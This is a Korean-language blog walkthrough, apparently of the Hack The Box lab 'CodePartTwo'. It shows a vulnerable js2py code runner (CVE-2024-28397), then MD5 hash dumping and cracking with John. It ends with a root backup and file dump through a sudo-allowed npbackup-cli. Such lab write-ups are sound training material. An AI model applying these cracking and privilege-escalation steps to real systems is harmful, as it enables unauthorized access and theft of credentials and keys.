d0razi's brain

[Machine] CodePartTwo

5 min read

Box Info

NameDifficulty
CodePartTwoEasy

nmap

[Aug 26, 2025 - 12:47:09 (KST)] exegol-htb
CodeTwo # nmap -sC -sV codetwo.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2025-08-26 12:47 KST
Nmap scan report for codetwo.htb (10.10.11.82)
Host is up (0.52s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 a047b40c6967933af9b45db32fbc9e23 (RSA)
|   256 7d443ff1b1e2bb3d91d5da580f51e5ad (ECDSA)
|_  256 f16b1d3618067a053f0757e1ef86b485 (ED25519)
8000/tcp open  http    Gunicorn 20.0.4
|_http-title: Welcome to CodeTwo
|_http-server-header: gunicorn/20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.77 seconds

CVE-2024-28397

http://codetwo.htb:8000 으로 접속 후 로그인을 해보면 사진과 같이 자바스크립트 온라인 에디터가 서비스 중입니다.

로그아웃을 하고 메인화면에 DOWNLOAD APP이 있어서 파일을 다운로드 후 app.py에서 js2py 라이브러리 0.74 버전을 사용하여 구현한 것을 확인했습니다.

 
@app.route('/run_code', methods=['POST'])
def run_code():
    try:
        code = request.json.get('code')
        result = js2py.eval_js(code)
        return jsonify({'result': result})
    except Exception as e:
        return jsonify({'error': str(e)})
 
if __name__ == '__main__':
    with app.app_context():
        db.create_all()
    app.run(host='0.0.0.0', debug=True)
 
[Aug 26, 2025 - 12:54:24 (KST)] exegol-htb
app # cat requirements.txt
flask==3.0.3
flask-sqlalchemy==3.1.1
js2py==0.74

app@codetwo:~/app$ ls
app.py    __pycache__       static     users.db
instance  requirements.txt  templates
app@codetwo:~/app$ ls instance/
users.db
app@codetwo:~/app$ sqlite3 instance/users.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
code_snippet  user
sqlite> select * from user
   ...> ;
1|marco|649c9d65a206a75f5abe509fe128bce5
2|app|a97588c0e2fa3a024876339e27aeb42e
[Aug 27, 2025 - 17:23:42 (KST)] exegol-htb
CodeTwo # john --wordlist=`fzf-wordlists` --format=raw-md5 hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 ASIMD 4x2])
Warning: no OpenMP support for this hash type, consider --fork=10
Note: Passwords longer than 18 [worst case UTF-8] to 55 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
s--marco_pwd-----e (?)
1g 0:00:00:00 DONE (2025-08-27 17:24) 6.667g/s 22990Kp/s 22990Kc/s 22990KC/s sweetass9..sweetangel_1
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

marco 계정의 Credential을 얻었으니 이 정보로 marco 계정으로 로그인했습니다.

root.txt

marco@codetwo:~$ sudo -l
Matching Defaults entries for marco on codetwo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User marco may run the following commands on codetwo:
    (ALL : ALL) NOPASSWD: /usr/local/bin/npbackup-cli

npbackup-cli 라는 바이너리를 sudo 권한으로 실행할 수 있는걸 알았습니다.

npbackup은 config 파일을 기반으로 백업하는 유틸리티입니다.

홈 디렉토리에 npbackup.conf 파일이 있길래 backup_opt 경로만 /root로 수정해서 백업을 진행했습니다.

marco@codetwo:~$ sudo npbackup-cli -b -c ./npbackup.conf
2025-08-27 08:10:01,777 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2025-08-27 08:10:01,796 :: INFO :: Loaded config E1057128 in /home/marco/npbackup.conf
2025-08-27 08:10:01,804 :: INFO :: Searching for a backup newer than 1 day, 0:00:00 ago
2025-08-27 08:10:03,387 :: INFO :: Snapshots listed successfully
2025-08-27 08:10:03,388 :: INFO :: No recent backup found in repo default. Newest is from 2025-04-06 03:50:16.222832+00:00
2025-08-27 08:10:03,388 :: INFO :: Runner took 1.584407 seconds for has_recent_snapshot
2025-08-27 08:10:03,388 :: INFO :: Running backup of ['/root'] to repo default
2025-08-27 08:10:04,191 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excluded_extensions
2025-08-27 08:10:04,191 :: ERROR :: Exclude file 'excludes/generic_excluded_extensions' not found
2025-08-27 08:10:04,191 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excludes
2025-08-27 08:10:04,191 :: ERROR :: Exclude file 'excludes/generic_excludes' not found
2025-08-27 08:10:04,191 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/windows_excludes
2025-08-27 08:10:04,191 :: ERROR :: Exclude file 'excludes/windows_excludes' not found
2025-08-27 08:10:04,192 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/linux_excludes
2025-08-27 08:10:04,192 :: ERROR :: Exclude file 'excludes/linux_excludes' not found
2025-08-27 08:10:04,192 :: WARNING :: Parameter --use-fs-snapshot was given, which is only compatible with Windows
no parent snapshot found, will read all files
 
Files:          15 new,     0 changed,     0 unmodified
Dirs:            8 new,     0 changed,     0 unmodified
Added to the repository: 190.612 KiB (39.881 KiB stored)
 
processed 15 files, 197.660 KiB in 0:00
snapshot 26ade748 saved
2025-08-27 08:10:05,024 :: INFO :: Backend finished with success
2025-08-27 08:10:05,025 :: INFO :: Processed 197.7 KiB of data
2025-08-27 08:10:05,026 :: ERROR :: Backup is smaller than configured minmium backup size
2025-08-27 08:10:05,026 :: ERROR :: Operation finished with failure
2025-08-27 08:10:05,026 :: INFO :: Runner took 3.222844 seconds for backup
2025-08-27 08:10:05,026 :: INFO :: Operation finished
2025-08-27 08:10:05,031 :: INFO :: ExecTime = 0:00:03.256790, finished, state is: errors.
 
marco@codetwo:~$ sudo npbackup-cli --ls -c ./npbackup.conf
2025-08-27 08:11:59,494 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2025-08-27 08:11:59,513 :: INFO :: Loaded config 4E3B3BFD in /home/marco/npbackup.conf
2025-08-27 08:11:59,519 :: INFO :: Showing content of snapshot latest in repo default
2025-08-27 08:12:01,110 :: INFO :: Successfully listed snapshot latest content:
snapshot 26ade748 of [/root] at 2025-08-27 08:10:04.199784763 +0000 UTC by root@codetwo filtered by []:
/root
/root/.bash_history
/root/.bashrc
/root/.cache
/root/.cache/motd.legal-displayed
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.local/share/nano/search_history
/root/.mysql_history
/root/.profile
/root/.python_history
/root/.sqlite_history
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.vim
/root/.vim/.netrwhist
/root/root.txt
/root/scripts
/root/scripts/backup.tar.gz
/root/scripts/cleanup.sh
/root/scripts/cleanup_conf.sh
/root/scripts/cleanup_db.sh
/root/scripts/cleanup_marco.sh
/root/scripts/npbackup.conf
/root/scripts/users.db
 
2025-08-27 08:12:01,110 :: INFO :: Runner took 1.590647 seconds for ls
2025-08-27 08:12:01,110 :: INFO :: Operation finished
2025-08-27 08:12:01,114 :: INFO :: ExecTime = 0:00:01.621902, finished, state is: success.
marco@codetwo:~$ sudo npbackup-cli --dump /root/root.txt -c ./npbackup.conf
3---------root.txt-------------a

그래프 뷰